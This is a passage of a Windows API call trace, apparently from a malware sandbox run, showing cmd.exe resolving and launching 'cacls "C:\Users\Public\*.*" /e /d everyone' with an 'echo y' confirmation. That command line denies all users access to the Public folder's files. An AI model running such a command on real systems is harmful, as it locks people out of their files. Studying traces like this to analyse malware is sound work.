dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.297] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.297] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.297] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.297] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.297] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.297] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.297] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.297] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.297] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.297] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.298] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.298] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.298] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x94, hThread=0x8c, dwProcessId=0xbc4, dwThreadId=0xbc8)) returned 1 [0036.302] CloseHandle (hObject=0x8c) returned 1 [0036.302] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.302] GetEnvironmentStringsW () returned 0xd15f98* [0036.302] FreeEnvironmentStringsA (penv="=") returned 1 [0036.302] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.302] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.302] DuplicateHandle (in: hSourceProcessHandle=0x94, hSourceHandle=0x80, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0036.302] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0036.302] _close (_FileHandle=5) returned 0 [0036.302] _dup (_FileHandle=0) returned 4 [0036.302] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0036.303] _close (_FileHandle=3) returned 0 [0036.303] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.303] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.303] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.303] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.303] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.303] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.303] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.303] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.303] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.303] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.303] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.303] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.303] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.303] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.303] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.303] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.303] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.303] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.303] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.303] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.303] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.303] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.303] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.303] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.303] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.303] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.303] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.303] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.303] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.303] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.303] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.303] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.303] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.303] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.303] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.303] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.303] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.303] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.303] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.303] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.303] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.303] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.303] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.303] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.303] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.303] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.303] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.303] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.303] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.303] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.303] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.303] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.303] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.303] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.303] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.304] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.304] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.304] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.304] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.304] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.304] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.304] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.304] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.304] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.304] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.304] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.304] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.304] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.304] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.304] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.304] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.304] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.304] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.304] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.304] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.304] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.304] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.304] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.304] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.304] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.304] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.304] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.304] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.304] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.304] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0036.304] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0036.304] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0036.304] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.304] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.304] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.304] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.304] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.304] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.304] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.304] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.304] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.304] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.304] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.304] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.304] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.304] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.304] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.304] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.304] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.304] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.304] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.305] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.305] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.305] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.305] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.305] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.305] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.305] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.305] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.305] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.305] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.305] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.305] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.305] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.305] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.305] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.305] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.305] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.305] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.305] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.305] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.305] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.305] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.305] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.305] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.305] SetErrorMode (uMode=0x0) returned 0x0 [0036.305] SetErrorMode (uMode=0x1) returned 0x0 [0036.305] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1baf0, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0036.305] SetErrorMode (uMode=0x0) returned 0x1 [0036.305] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.305] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.305] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.305] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.305] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.305] GetLastError () returned 0x2 [0036.305] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.305] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18528 [0036.306] FindClose (in: hFindFile=0xd18528 | out: hFindFile=0xd18528) returned 1 [0036.306] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.306] GetLastError () returned 0x2 [0036.306] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18528 [0036.306] FindClose (in: hFindFile=0xd18528 | out: hFindFile=0xd18528) returned 1 [0036.306] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.306] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.306] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.306] SetErrorMode (uMode=0x0) returned 0x0 [0036.306] SetErrorMode (uMode=0x1) returned 0x0 [0036.306] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd15fa0, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0036.306] SetErrorMode (uMode=0x0) returned 0x1 [0036.306] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.306] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.306] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.306] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.306] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.306] GetLastError () returned 0x2 [0036.306] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.306] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0036.306] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0036.307] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.307] GetLastError () returned 0x2 [0036.307] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0036.307] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0036.307] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.307] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.307] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.342] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.343] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.343] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.343] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.343] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.343] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Users\\Public\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Users\\Public\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"C:\\Users\\Public\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x8c, hThread=0x80, dwProcessId=0xbd0, dwThreadId=0xbd4)) returned 1 [0036.346] CloseHandle (hObject=0x80) returned 1 [0036.346] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.346] GetEnvironmentStringsW () returned 0xd1b020* [0036.346] FreeEnvironmentStringsA (penv="=") returned 1 [0036.346] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.346] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0036.346] _close (_FileHandle=4) returned 0 [0036.346] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0036.418] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0036.418] CloseHandle (hObject=0x94) returned 1 [0036.418] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0036.421] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0036.422] CloseHandle (hObject=0x8c) returned 1 [0036.422] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.422] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0036.422] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.422] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0036.422] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.422] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.422] SetConsoleInputExeNameW () returned 0x1 [0036.422] GetConsoleOutputCP () returned 0x1b5 [0036.422] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.422] SetThreadUILanguage 